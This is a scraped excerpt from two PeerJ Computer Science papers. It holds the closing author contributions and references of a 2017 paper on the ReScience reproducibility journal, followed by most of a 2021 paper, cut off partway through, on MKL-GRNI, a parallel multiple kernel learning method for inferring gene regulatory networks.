PeerJ. Author Contributions • Nicolas P. Rougier wrote the paper, prepared figures and/or tables, reviewed drafts of the paper, co-founder, editor, author. • Konrad Hinsen wrote the paper, reviewed drafts of the paper, co-founder, editor. • Frédéric Alexandre, Alexandra K. Diem, Rafael N. Henriques, Owen Petchey, Frank Stollmeier and Guillaume Viejo reviewed drafts of the paper, author. • Thomas Arildsen, Pierre de Buyl and Olivia Guest wrote the paper, reviewed drafts of the paper, editor. Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 14/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.142 • Lorena A. Barba, C. Titus Brown, Timothée Poisot, Karthik Ram and Tiziano Zito reviewed drafts of the paper, editor. • Fabien C.Y. Benureau, Ozan Caglayan, Andrew P. Davison, Marc-André Delsuc and Etienne Roesch wrote the paper, reviewed drafts of the paper, reviewer. • Georgios Detorakis, Mehdi Khamassi, Aaron Shifman and Julien Vitay reviewed drafts of the paper, reviewer, author. • Damien Drix, Pierre Enel, Matt G. Hall, Xavier Hinaut, Kamil S. Jaron, Almar Klein, Tiina Manninen, Pietro Marchesi, Daniel McGlinn, Hans Ekkehard Plesser, Yoav Ram, Cyrille Rossant, Marcel Stimberg, Federico Vaggi, Anya E. Vostinar and Roman Yurchak reviewed drafts of the paper, reviewer. • Benoît Girard wrote the paper, reviewed drafts of the paper, editor, reviewer, author. • Christoph Metzner wrote the paper, reviewed drafts of the paper, reviewer, author. • Vahid Rostami and Joseph Stachelek wrote the paper, reviewed drafts of the paper, author. Data Availability The following information was supplied regarding data availability: ReScience journal: https://zenodo.org/communities/rescience/. REFERENCES Anaconda Inc. 2017. Conda. Available at https://conda.io/ . Baker M. 2016. 1, 500 scientists lift the lid on reproducibility. Nature 533(7604):452–454 DOI 10.1038/533452a. Colberg C, Proebsting TA. 2016. Repeatability in computer systems research. Communi- cations of the ACM 59(3):62–69 DOI 10.1145/2812803. Coudert F-X. 2017. Reproducible research in computational chemistry of materials. Chemistry of Materials 29(7):2615–2617 DOI 10.1021/acs.chemmater.7b00799. Courtès L, Wurmus R. 2015. Reproducible and user-controlled software environments in HPC with Guix. In: Hunold S, Costan A, Giménez D, Iosup A, Ricci L, Requena MEG, Scarano V, Varbanescu AL, Scott SL, Lankes S, Weidendorfer J, Alexander M, eds. Euro-Par 2015: parallel processing workshops. Lecture notes in computer science, vol. 9523. Cham: Springer. Crook SM, Davison AP, Plesser HE. 2013. 20 years of computational neuroscience. In: Bower MJ, ed. Chap. Learning from the past: approaches for reproducibility in computational neuroscience. New York: Springer New York, 73–102. Davison AP. 2012. Automated capture of experiment context for easier reproducibility in computational research. Computing in Science and Engineering 14:48–56 DOI 10.1109/MCSE.2012.41. Docker Inc. 2017. Docker. Available at https://www.docker.com/ . Donoho DL, Maleki A, Rahman IU, Shahram M, Stodden V. 2009. Reproducible research in computational harmonic analysis. Computing in Science Engineering 11(1):8–18 DOI 10.1109/MCSE.2009.15. Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 15/17 https://peerj.com https://zenodo.org/communities/rescience/ https://conda.io/ http://dx.doi.org/10.1038/533452a http://dx.doi.org/10.1145/2812803 http://dx.doi.org/10.1021/acs.chemmater.7b00799 http://dx.doi.org/10.1109/MCSE.2012.41 https://www.docker.com/ http://dx.doi.org/10.1109/MCSE.2009.15 http://dx.doi.org/10.7717/peerj-cs.142 Guo PJ, Engler D. 2011. CDE: using system call interposition to automatically create portable software packages. In: Proceedings of the 2011 USENIX annual technical conference, USENIX’11. Portland: USENIX Association. Available at http://dl.acm. org/citation.cfm?id=2002181.2002202. Halchenko YO, Hanke M. 2015. Four aspects to make science open ‘‘by design’’ and not as an after-thought. GigaScience 4(1) DOI 10.1186/s13742-015-0072-7. Hinsen K. 2015. Writing software specifications. Computing in Science & Engineering 17(3):54–61 DOI 10.1109/mcse.2015.64. Ioannidis JPA. 2005. Why most published research findings are false. PLOS Medicine 2(8):e124 DOI 10.1371/journal.pmed.0020124. Iqbal SA, Wallach JD, Khoury MJ, Schully SD, Ioannidis JPA. 2016. Reproducible research practices and transparency across the biomedical literature. PLOS Biology 14(1):e1002333 DOI 10.1371/journal.pbio.1002333. Janz N. 2015. Bringing the gold standard into the class room: replication in university teaching. International Studies Perspectives Epub ahead of print Mar 9 2015 DOI 10.1111/insp.12104. Kitzes J, Turek D, Deniz F (eds.) 2017. The practice of reproducible research: case studies and lessons from the data-intensive sciences. Oakland: University of California Press. Lindholm T, Yellin F. 1999. Java virtual machine specification. Second Edition. Boston: Addison-Wesley Longman Publishing Co., Inc. Manninen T, Havela R, Linne M-L. 2017. Reproducibility and comparability of com- putational models for astrocyte calcium excitability. Frontiers in Neuroinformatics 11:11 DOI 10.3389/fninf.2017.00011. Mesnard O, Barba LA. 2017. Reproducible and replicable CFD: it’s harder than you think. IEEE/AIP Computing in Science and Engineering 19(4):44–55 DOI 10.1109/mcse.2017.3151254. Munafò MR, Nosek BA, Bishop DVM, Button KS, Chambers CD, Du Sert NP, Simon- sohn U, Wagenmakers E-J, Ware JJ, Ioannidis JPA. 2017. A manifesto for repro- ducible science. Nature Human Behaviour 1(1):0021 DOI 10.1038/s41562-016-0021. Murta L, Braganholo V, Chirigati F, Koop D, Freire J. 2015. noWorkflow: capturing and analyzing provenance of scripts. In: Provenance and annotation of data and processes. Lecture notes in computer science, vol. 8628. Berlin: Springer International Publishing, 71–83. Open Science Collaboration. 2015. Estimating the reproducibility of psychological science. Science 349(6251):aac4716–aac4716 DOI 10.1126/science.aac4716. Perkel J. 2016. Democratic databases: science on GitHub. Nature 538(7623):127–128 DOI 10.1038/538127a. Sandve GK, Nekrutenko A, Taylor J, Hovig E. 2013. Ten simple rules for repro- ducible computational research. PLOS Compututational Biology 9(10):e1003285 DOI 10.1371/journal.pcbi.1003285. Smith AM, Niemeyer KE, Katz DS, Barba LA, Githinji G, Gymrek M, Huff KD, Madan CR, Cabunoc Mayes A, Moerman KM, Prins P, Ram K, Rokem A, Teal TK, Valls Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 16/17 https://peerj.com http://dl.acm.org/citation.cfm?id=2002181.2002202 http://dl.acm.org/citation.cfm?id=2002181.2002202 http://dx.doi.org/10.1186/s13742-015-0072-7 http://dx.doi.org/10.1109/mcse.2015.64 http://dx.doi.org/10.1371/journal.pmed.0020124 http://dx.doi.org/10.1371/journal.pbio.1002333 http://dx.doi.org/10.1111/insp.12104 http://dx.doi.org/10.3389/fninf.2017.00011 http://dx.doi.org/10.1109/mcse.2017.3151254 http://dx.doi.org/10.1038/s41562-016-0021 http://dx.doi.org/10.1126/science.aac4716 http://dx.doi.org/10.1038/538127a http://dx.doi.org/10.1371/journal.pcbi.1003285 http://dx.doi.org/10.7717/peerj-cs.142 Guimera R, Vanderplas JT. 2017. Journal of Open Source Software (JOSS): design and first-year review. ArXiv preprint. arXiv:1707.02264. Stachelek J. 2016. [Re] least-cost modelling on irregular landscape graphs. ReScience 2(1) DOI 10.5281/zenodo.45852. Topalidou M, Leblois A, Boraud T, Rougier NP. 2015. A long journey into repro- ducible computational neuroscience. Frontiers in Computational Neuroscience 9:30 DOI 10.3389/fncom.2015.00030. Topalidou M, Rougier NP. 2015. [Re] interaction between cognitive and motor cortico- basal ganglia loops during decision making: a computational study. ReScience 1(1) DOI 10.5281/zenodo.47146. Viejo G, Girard B, Khamassi M. 2016. [Re] speed/accuracy trade-off between the habitual and the goal-directed process. ReScience 2(1) DOI 10.5281/zenodo.27944. Wilson G. 2016. Software carpentry: lessons learned. F1000Research 3:62 DOI 10.12688/f1000research.3-62.v2. Wilson G, Aruliah DA, Brown CT, Hong NPC, Davis M, Guy RT, Haddock SHD, Huff KD, Mitchell IM, Plumbley MD, Waugh B, White EP, Wilson P. 2014. Best practices for scientific computing. PLOS Biology 12(1):e1001745 DOI 10.1371/journal.pbio.1001745. Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 17/17 https://peerj.com http://arXiv.org/abs/1707.02264 http://dx.doi.org/10.5281/zenodo.45852 http://dx.doi.org/10.3389/fncom.2015.00030 http://dx.doi.org/10.5281/zenodo.47146 http://dx.doi.org/10.5281/zenodo.27944 http://dx.doi.org/10.12688/f1000research.3-62.v2 http://dx.doi.org/10.1371/journal.pbio.1001745 http://dx.doi.org/10.7717/peerj-cs.142 work_2pr3au7mozfx3bfmyg4bc4yo7u ---- MKL-GRNI: A parallel multiple kernel learning approach for supervised inference of large-scale gene regulatory networks MKL-GRNI: A parallel multiple kernel learning approach for supervised inference of large-scale gene regulatory networks Nisar Wani1 and Khalid Raza2 1 Govt. Degree College Baramulla, Jammu & Kashmir, India 2 Department of Computer Science, Jamia Millia Islamia, New Delhi, India ABSTRACT High throughput multi-omics data generation coupled with heterogeneous genomic data fusion are defining new ways to build computational inference models. These models are scalable and can support very large genome sizes with the added advantage of exploiting additional biological knowledge from the integration framework. However, the limitation with such an arrangement is the huge computational cost involved when learning from very large datasets in a sequential execution environment. To overcome this issue, we present a multiple kernel learning (MKL) based gene regulatory network (GRN) inference approach wherein multiple heterogeneous datasets are fused using MKL paradigm. We formulate the GRN learning problem as a supervised classification problem, whereby genes regulated by a specific transcription factor are separated from other non-regulated genes. A parallel execution architecture is devised to learn a large scale GRN by decomposing the initial classification problem into a number of subproblems that run as multiple processes on a multi-processor machine. We evaluate the approach in terms of increased speedup and inference potential using genomic data from Escherichia coli, Saccharomyces cerevisiae and Homo sapiens. The results thus obtained demonstrate that the proposed method exhibits better classification accuracy and enhanced speedup compared to other state-of-the-art methods while learning large scale GRNs from multiple and heterogeneous datasets. Subjects Bioinformatics, Computational Biology, Data Mining and Machine Learning Keywords Gene regulatory networks, GRN inference, large-scale GRN, Systems biology, Network biology INTRODUCTION The problem of understanding gene interactions and their influence through network inference and analysis is of great significance in systems biology (Albert, 2007). The aim of this inference process is to establish relationships between genes and construct a network topology based on the evidence provided by different data types. Among various network inference studies, gene regulatory network inference (GRNI) has remained of particular interest to researchers with extensive scientific literature generated in this domain. Gene regulatory networks (GRNs) are biological networks where genes serve as nodes and the edges connecting them serve as regulatory relations (Lee et al., 2002; Raza & Alam, 2016). Standard methods for GRN inference such as RELNET How to cite this article Wani N, Raza K. 2021. MKL-GRNI: A parallel multiple kernel learning approach for supervised inference of large- scale gene regulatory networks. PeerJ Comput. Sci. 7:e363 DOI 10.7717/peerj-cs.363 Submitted 19 October 2020 Accepted 29 December 2020 Published 28 January 2021 Corresponding author Khalid Raza, kraza@jmi.ac.in Academic editor Othman Soufan Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.363 Copyright 2021 Wani and Raza Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.363 mailto:kraza@�jmi.�ac.�in https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.363 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ (Butte & Kohane, 1999), ARACNE (Margolin et al., 2006), CLR (Faith et al., 2007), SIRENE (Mordelet & Vert, 2008) and GENIE3 (Huynh-Thu et al., 2010) mostly use transcriptomic data for GRN inference. Among these methods, our approach is modeled along the same principle as SIRENE. SIRENE is a general method to infer unknown regulatory relationships between known transcription factors (TFs) and all the genes of an organism. It uses a vector of gene expression data and a list of known regulatory relationships between known TFs and their target genes. However, integration of this data with other genomic data types such as protein–protein interaction (PPI), methylation expression, sequence similarity and phylogenetic profiles has drastically improved GRN inference (Hecker et al., 2009). A comprehensive list of state-of-the-art data integration techniques for GRN inference has been reviewed in (Wani & Raza, 2019a). In this article, we aim to integrate gene expression, methyl expression and TF-DNA interaction data using advanced multiple kernel learning (MKL) library provided by shogun machine learning toolbox (Sonnenburg et al., 2010) and design an algorithm to infer gene regulatory networks (GRNs). Besides, we also integrate PPI data and other data such as gene ontology information as source of prior knowledge to enhance the accuracy of network inference. The problem of network inference is modeled as a binary classification problem whereby a gene being regulated by a given TF is treated as a positive label and negative otherwise. To infer a large-scale network, the MKL model needs to be trained for each TF with a set of known regulations for the whole genome. Given N TFs, we need to train N different classification models individually and then combine the results from these models for a complete network inference task. As the number of TFs increase, the number of classification models also increase, creating resource deficiency and long execution times for the inference algorithm. The proposed approach attempts to provide a solution to this problem by distributing these classification models to different processors on a multi-processor hardware platform using parallel processing library from Python. The results from these models are stored in a shared queue object which are later on used for network inference. A detailed description of the model is contained in the methods section. RELATED LITERATURE An early attempt to learn and classify gene function from integrated datasets using kernel methods was carried out in Pavlidis et al. (2002). They trained a support vector machine (SVM) for gene function classification with a heterogeneous kernel derived from a combination of two different types of data (e.g., gene expression and phylogenetic profiles). Since SVM does not learn from multiple kernel matrices simultaneously, they proposed three different ways to fuse two datasets and referred to these fusion methods as (i) early integration, (ii) intermediate integration and (iii) late integration approaches. In early integration, feature vectors from heterogeneous data types are concatenated to build a single length vector for a given set of genes. This extended dataset is then transformed into a kernel matrix using appropriate kernel function and serves as an input to the SVM model from where we can draw biological inferences. In the case of intermediate integration, the two datasets are first transformed into their respective kernel Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 2/20 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ matrices; subsequently these kernel matrices are added together to yield an integrated kernel for SVM training. For late integration, the authors trained the SVM models individually using the heterogeneous datasets. The probability scores which act as discriminant values obtained from separate SVM models are then added together for gene function prediction. In fact, kernel-based methods as effective integration techniques were first proposed in Lanckriet et al. (2004), wherein a 1-norm soft margin SVM is trained for a classification problem, separating membrane proteins from ribosomal proteins. They combined heterogeneous biological datasets such as PPI, amino acid sequences and gene expression data characterizing different proteins by transforming them into multiple positive semidefinite kernel matrices using different kernel functions. Their findings reveal an improved classifier performance when all datasets are integrated as a unit compared to testing the classifier on individual datasets. In an earlier study (Lanckriet et al., 2003) on function prediction for baker’s yeast proteins, they trained an SVM classifier with multiple datasets of different types and achieved an improved performance over a classifier trained using single data type. In yet another study for network inference using kernel data integration (Yamanishi, Vert & Kanehisa, 2004), the authors fused four different datasets, namely gene expression data, protein interaction data, protein localization data and data from phylogenetic profiles. These datasets are transformed into different kernel matrices. Datasets comprising of gene expression, protein localization and data from phylogenetic profiles were kernelized using Gaussian, polynomial and linear kernel functions. Graph datasets were kernelized using diffusion kernel (Kondor & Lafferty, 2002). This study compared both unsupervised and supervised inference methods on single and integrated datasets. To assess the accuracy of the methods, the inferred networks are compared with a gold standard protein network. Contrary to the unsupervised approaches, the supervised approach seems to make interesting predictions and capture most of the information from the gold standard. They observed that data from transcriptomic and phylogenetic profiles seem to contribute with an equal quantum of information followed by noisy PPI and localization data. Applying a supervised approach to integrated datasets seems to produce overall best results, therefore highlighting the importance of guided network inference from integrated prior biological knowledge. In another study, Ben-Hur & Noble (2005) applied kernel methods to PPI studies and proposed a pair-wise kernel between two pairs of proteins in order to construct a similarity matrix. This pairwise kernel is based on three sequence kernels, a spectrum kernel, a motif, and a Pfam kernel. They further extended this experiment to explore the effect of adding kernels from non-sequence data, such as gene ontology annotations, homology scores and Mutual clustering coefficient (MCC) derived from protein interactions computed in each cross-validation fold. Integrating these non-sequence features with the pairwise kernel resulted in improved performance than any method by itself. Another integration and supervised learning method that uses MKL is the Feature Selection Multiple Kernel Learning (FSMKL) proposed by Seoane et al. (2013). The feature Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 3/20 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ selection is performed on variable number of features per kernel, separating feature sets from each data type with greater relevance to the given problem. The selection criteria uses statistical scoring by ranking features that are statistically aligned with the class labels and biological insights, where genes that are present in a specific pathway are chosen. They integrate gene expression, copy number variation and other genomic data from KEGG pathway. These data are transformed into their base kernels and integrated using MKL framework into a combined kernel. The prior biological knowledge in the form of pathway information serves as central criterion for FSMKL to cluster samples. The authors claim that FSMKL performance is comparable to the other state-of-the-art breast cancer prognosis methods from DREAM challenge. Speicher & Pfeifer (2015) adopted an unsupervised approach to discover cancer subtypes from an integrated kernel using MKL. The proposed method called Regularized MKL Locality Preserving Projections (rMKL-LPP) integrates multi-omics data such as gene expression, DNA methylation and miRNA expression profiles of multiple cancer types from TCGA (Tomczak, Czerwińska & Wiznerowicz, 2015). This regularized version extends the dimensionality reduction variant of the MKL technique (MKL-DR) proposed by Yan et al. (2007). The regularization term allows to use different types of kernels during optimization process and also avoids overfitting. They cluster the samples by applying k-means on the distance summation of each sample’s k-Nearest Neighbors by applying Locality Preserving Projections (LPP). Also many approaches have been proposed for parameter estimation of such large-scale and integrated models. Besides, cross validation, grid search and randomised parameter optimization methods (Remli et al., 2019) have proposed a cooperative enhanced scatter search for parameter for high dimensional biological models. Their proposed method is executed in a parallel environment and can be faster than other methods in providing accurate estimate of model parameters. Multiple kernel Learning approach has also been applied to the domain of drug- target interaction network inference and drug bioactivity prediction. For drug-target interaction prediction, Nascimento, Prudêncio & Costa (2016) proposed a new MKL based algorithm that selects and combines kernels automatically on a bipartite drug-protein prediction problem. Their proposed method extends the Kronecker regularized least squares approach (KronRLS) (Van Laarhoven, Nabuurs & Marchiori, 2011) to fit in a MKL setting. The method uses L2 regularization to produce a non-sparse combination of base kernels. The proposed method can cope with large drug vs. target interaction matrices; does not require sub-sampling of the drug-target network; and is also able to combine and select relevant kernels. They performed the comparative analysis of their proposed method with top performers from single and integrative kernel approaches and demonstrated the competitiveness of KronRLS-MKL to all the evaluated scenarios. Similarly for drug bioactivity prediction (Cichonska et al., 2018) proposed pairwise MKL method in order to address the scalability issues in handling massive pairwise kernel matrices in terms of both computational complexity and memory demands of such prediction problems. The proposed method has been successfully implemented to the drug bioactivity inference problems and provides a general approach other pairwise MKL spaces. Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 4/20 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ Since MKL is applied to solve large scale learning problems, various efforts have been undertaken to devise a scheme whereby MKL algorithm can be run in a multiprocessor and distributed computational environment. The authors in Chen & Fan (2014) have proposed a parallel multiple kernel learning (PMKL) using hybrid alternating direction method multipliers (H-ADMM). The proposed method makes the local processors to co-ordinate with each other to achieve the global solution. The results of their experiments demonstrated that PMKL displays fast execution times and higher classification accuracies. Another important study to address the scalability and computational requirements in the domain of large scale learning has been carried out by Alioscha-Perez, Oveneke & Sahli (2019). They proposed SVRG-MKL an MKL solution with inherent scalability properties that can combine multiple descriptors involving millions of samples. They conducted extensive experimental validation of their proposed method on several benchmarking datasets confirming a higher accuracy and significant speedup for SVRG-MKL. In one of our recent works, we proposed a data fusion and inference model, called iMTF-GRN, based on Non-negative Matrix Tri-factorization that integrates the diverse types of biological data (Wani & Raza, 2019b). The advantage of our proposed parallel MKL-GRNI approach is that it is simple to implement and does not need complex coding to distribute multiple classification problems in a multiprocessor environment. Our method employs shared queue objects for distributing inputs and collecting outputs from multiple processors compared to PMKL (Chen & Fan, 2014) where multiple processors are explicitly made to co-ordinate using the hybrid alternating direction method of multipliers (H-ADMM) introducing complexity and an added computational overhead. Also, we chose basic addition operation to fuse multiple kernels compared to Kron-RLS MKL (Cichonska et al., 2018) method, where the fusion of multiple kernels is achieved by performing Kronecker product operation which requires calculating the inverse of individual kernels, hence a computational overhead compared to a basic arithmetic operation. Also for MKL implementation, we used the Shogun toolbox, which is a highly optimized, stable and efficient tool developed in C++ by Sonnenburg et al. (2010) making it a suitable candidate for computing-intensive and large-scale learning problems. MATERIALS AND METHODS The proposed method adopts a supervised approach to learn new interactions between a TF and the whole genome of an organism. The algorithm operates on multiple datasets that characterize the genes of an organism. Since we are adopting an integrated approach, datasets such as gene expression, known TF-gene regulations, PPI, and DNA-methylation data can be combined using MKL approach. All these datasets are carefully chosen owing to their role in gene regulation. The TF-gene interaction data serves a dual purpose. It supplies the algorithm with prior knowledge about the regulatory relationships, and for each TF, the known target gene list also form the labels for the MKL classifier. For each TF, a set of known gene targets serve as positive examples. For negative examples, we divide our input into two subsets; the MKL classifier is trained using positive examples for which no prediction is needed, and the other subset contains Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 5/20 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ negative examples. We perform 10-fold cross-validation using the same scheme and obtain discriminant values for all the genes with no prior regulation knowledge for this TF. This whole procedure is repeated for all the TFs. The idea here is to identify the set of genes whose expression profiles match those of positive examples even though the classifier is supplied with some false negative examples in the training set. A graphical overview of this architecture is depicted in Fig. 1. The problem of GRN inference from integrated datasets through supervised learning using MKL is not a trivial task. The nature of the complexity raises manifold while considering GRN inference of organisms with large genomes sizes. In this scenario, the model training and testing becomes TF specific. Therefore, the inference problem is decomposed into a set of classification subproblems corresponding to the total number of TFs present in the input Gene-TF interaction matrix. A sequential approach to such a problem scenario would require to run each subproblem one after the other in a loop. However, as we increase the number of TFs, the execution time of the algorithm also increases. To overcome such problems, we devise a strategy of parallel execution for the algorithm wherein multiple subproblems run simultaneously across different processors of a multi-processor hardware platform as explained in Algorithm 1. Outputs generated by each model in the form of confidence scores (probability that a given TF regulates a gene) are stored in a shared queue object. Once all the subproblems finish their execution, the shared object is iterated to collect the results generated by all the models in order to build a single output matrix. In case the number of TFs is more than the number of available processors, they are split into multiple groups and dispatched to each processor with the condition that the number of TFs are divided in such a manner so that all the processors receive equal number of classification models. Figure 1 Application architecture of MKL-GRNI (A) Combined kernel (B) Decomposed regulation matrices (C) Parallel distribution and model building (D) Model execution (E) Writing results to shared object. Full-size DOI: 10.7717/peerj-cs.363/fig-1 Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 6/20 http://dx.doi.org/10.7717/peerj-cs.363/fig-1 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ Kernel methods for genomic data fusion Kernel methods represent a mathematical framework which embeds data points (genes, proteins, drugs, etc) from input spaceIto feature space F by employing a kernel function. Genomic datasets viz., mRNA expression levels from RNA-seq, DNA methylation profiles and TF-gene regulation matrix obtained from different databases comprise heterogeneous datasets that can be fused using kernel methods and serve as the building blocks for inference of gene regulatory networks. A modular and generic approach to pattern analysis, kernel methods can operate on very high dimensional data in feature space by performing an inner product on the input data using a kernel function (Shawe-Taylor & Cristianini, 2004). An algorithm is devised that can work with Algorithm 1 MKL-GRNI Parallel approach for supervised inference of large-scale gene regulatory networks. Input: k datasets D1, D2, . . . ., Dk Input: Regulation binary matrix R for Classification labels Output: A matrix of decision scores DS for TF-Gene interaction begin Transform D1, D2, . . . ., Dk int k1, k2, . . . ., kn kernels using appropriate kernel function Fuse n Kernels as K = k1 + k2+…+kn define mkl parameters params (C, norm, epsilon) /* Distribute Source TF’s among multiple CPU’s */ foreach cpu in the cpu list do do in parallel foreach TF in source TF list do /* Set MKL parameters and Data */ set mkl.kernel ) K set mkl.labels )R set mkl.parameters ) params /* Obtain decision scores for MKL algorithm between each TF and all genes in the genomes */ DSTF ) ApplyMKL() end put DSTFk in queue Q end end foreach q in Q do DSTFk ) q.val end end Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 7/20 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ such data and learn patterns. Such an algorithm is more generic as they operate on any data type that can be kernelized. These kernels are data specific, such as Gaussian, polynomial and sigmoid kernels for vectorial data, diffusion kernels for graph data, and string kernels for different types of sequence data. The kernel part is data specific, creating a flexible and modular approach to combine multiple modules to obtain complex learning systems. A graphical depiction of this fusion technique is shown in Fig. 2. The choice of different kernel functions for transforming datasets into their respective kernel matrices is made after a thorough analysis of literature in the field of kernel methods and MKL methods. MKL model Multiple kernel learning is based on integrating many features of objects such as genes, proteins, drugs, etc., via their kernel matrices and represents a paradigm shift from Figure 2 Genomic data fusion by combining kernel matrices from multiple kernels into a single combined kernel. Full-size DOI: 10.7717/peerj-cs.363/fig-2 Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 8/20 http://dx.doi.org/10.7717/peerj-cs.363/fig-2 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ machine learning models that use single object features (Sonnenburg et al., 2006). This combined information from multiple kernel matrices is provided as an input to MKL algorithm to perform classification/regression tasks on unseen data. Information represented by the kernel matrices can be combined by applying the basic algebraic operations, such as addition, multiplication, and exponentiation such that the positive semi-definiteness of the candidate kernels is preserved in the final kernel matrix. The resultant kernel can be defined by following equations using k1 and k2 as candidate kernel matrices and ϕ1(x) and ϕ2(x), their corresponding embedding in the feature space. K ¼ k1 þ k2 (1) with the new induced embedding �x ¼ �1ðxÞ; �2ðxÞ (2) Given a kernel set K = {k1, k2, : : : , km}, an affine combination of m parametrized kernels can be formed as given by: - K ¼ Xm i¼1 liki (3) subject to the constraint that μi (weights) are positive that is, μi ≥ 0, i = 1……..m. With these kernel matrices as input, a statistical classifier such as SVM separates the two classes using a linear discriminant by inducing a margin in the feature space. To find this discriminant, an optimization problem, known as a quadratic program (QP) needs to be solved. QP belongs to a class of convex optimization problems, which are easily solvable. Shogun toolbox solves this MKL optimization problem using semidefinite programing (SDP) first implemented for MKL learning by Lanckriet et al. (2004). Based on this margin, we classify SVM algorithms into hard, 1-norm soft and 2-norm soft margin SVM. Here we use the 1-norm soft margin SVM and SDP for MKL optimization and classification from heterogeneous datasets explained in our earlier work on MKL for biomedical image analysis (Wani & Raza, 2018). A detailed literature on SVM algorithms is covered in (Scholkopf & Smola, 2001). Datasets To test the parallel MKL algorithm on multiple datasets, we downloaded gene expression data of Escherichia coli and Saccharomyces cerevisiae from DREAM5 Network inference challenge (Marbach et al., 2012) along with their gold standard network and human breast cancer transcriptomic data from TCGA. Some prominent features of these data are shown in Table 1. Because the MKL paradigm provides the platform to fuse heterogeneous datasets, we download PPI data for both E. coli and S. cerevisiae from STRING database (Szklarczyk et al., 2011). The PPI data is supplied as prior biological knowledge to the algorithm in order to improve its inference accuracy as MKL can learn from multiple datasets. To supplement the human transcriptome with additional biological knowledge, Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 9/20 http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ we download DNA methylation expression data for all the genes in the transcriptome from the TCGA broad institute data portal (https://gdac.broadinstitute.org/). The regulation data (i.e., known interaction between genes and TFs) for E.coli and S. cerevisiae were extracted from the gold standard network provided in the DREAM dataset, however, for GRN inference in humans, the regulation data has been collected from a number of databases that store TF-gene interaction data derived from ChIP-seq and ChIP-ChIP experiments. We collected a list of 66 TFs from the ENCODE data portal (https://www. encodeproject.org/) for which ChIP-seq experiments were carried out on MCF7 breast cancer cell lines across different experimental labs. The targets of these TFs were extracted from ENCODE (ENCODE Project Consortium, 2004), TRED (Jiang et al., 2007) and TRRUST (Han et al., 2015) databases. Hardware and software requirements The hardware platform used in this study is an IBM System X3650 M4 server model that includes an Intel Xeon processor having 24 cores and a primary memory of 32 GB with extendable option of 64 GB. The system supports a 64-bit memory addressing scheme having powerful 3.2 GHz/1066 MHz Intel Xeon processors with 1066 MHz front- side bus (FSB) and 4 MB L2 cache (each processor is dual core and comes with 2 × 2 MB (4 MB) L2 cache). The system also supports hyper threading features for more efficient program execution. In order to exploit this multi-core and multithreading features present in the hardware system we used multiprocessing Python package to dispatch different sub-problems across multiple cores of the computing system. The process of distribution of different learning sub-problems among different cores of a multi-core machine has been demonstrated in Fig. 1. For fusion of multiple datasets we use MKL approach whereby different datasets are first converted into similarity matrices (Kernels) and then joined to generate a final integrated matrix for learning TF-gene targets. We use MKL Python library provided by Shogun Machine Learning toolbox for implementing the proposed algorithm. RESULTS All the genomic datasets are transformed into their respective kernel matrices by using an appropriate kernel function. For example, datasets such as gene expression and DNA methylation expression data are transformed using a Gaussian radial basis function. The PPI data is converted into a diffusion kernel, K = eβH, where H is the negative Laplacian derived from adjacency and Degree matrix H = A − D of PPI graph. The TF-Target gene regulation data is organized as a binary matrix of labels (i.e., 1 and −1) Table 1 Dataset description of different organisms for supervised GRN inference. Organism Genes Samples Transcription factors Known regulations Known targets E. coli 4,297 805 140 1,979 953 S. cerevisiae 5,657 536 120 4,000 2,721 Homo sapiens 19,201 1,212 66 73,052 12,028 Wani and Raza (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.363 10/20 https://gdac.broadinstitute.org/ https://www.encodeproject.org/ https://www.encodeproject.org/ http://dx.doi.org/10.7717/peerj-cs.363 https://peerj.com/computer-science/ with genes in rows and TFs in columns. The number of rows correspond to the genome size of the organism and the number of columns correspond to the total number of TFs being used for GRN inference. The elements of each column with value 1 signify that a gene gi is regulated by TFj and −1 otherwise. Such an organization of the regulation data allows us to use each column of the matrix as a label for individual classification problems in a supervised learning environment. We perform two sets of experiments with our proposed approach in order to evaluate the scalability and the inference potential of the supervised learning from heterogeneous datasets using MKL paradigm. Our first experiment records execution times required to learn from varying genome and sample sizes on single and multi-processor architectures, given a set of TFs. Our second experiment focuses on the evaluation of inference potential of this approach on different genome and sample sizes. Since our problem of GRN inference is complex, the experiment aims to evaluate the parallel nature of the MKL algorithm by decomposing supervised inference of GRNs for multiple TFs into a number of subproblems and distribute them to multiple processors for parallel execution. Varying the genome and sample sizes in these experiments is to evaluate how efficiently MKL based models scale to large genomes where most of the GRN models developed till date do not perform optimally as reported in Marbach et al. (2012). The proposed method is implemented in Python and the code along with data is available at (https://github.com/waninisar/MKL-GRNI). To assess the performance of the parallel MKL-GRNI on different genomes characterized by datasets in Table 1. We execute the algorithm and embed the required code for the evaluation metrics. Once the algorithm completes its execution run, all the essential metrics are recorded for further analysis. The metrics are computed to evaluate the capacity of our approach in terms of reduced 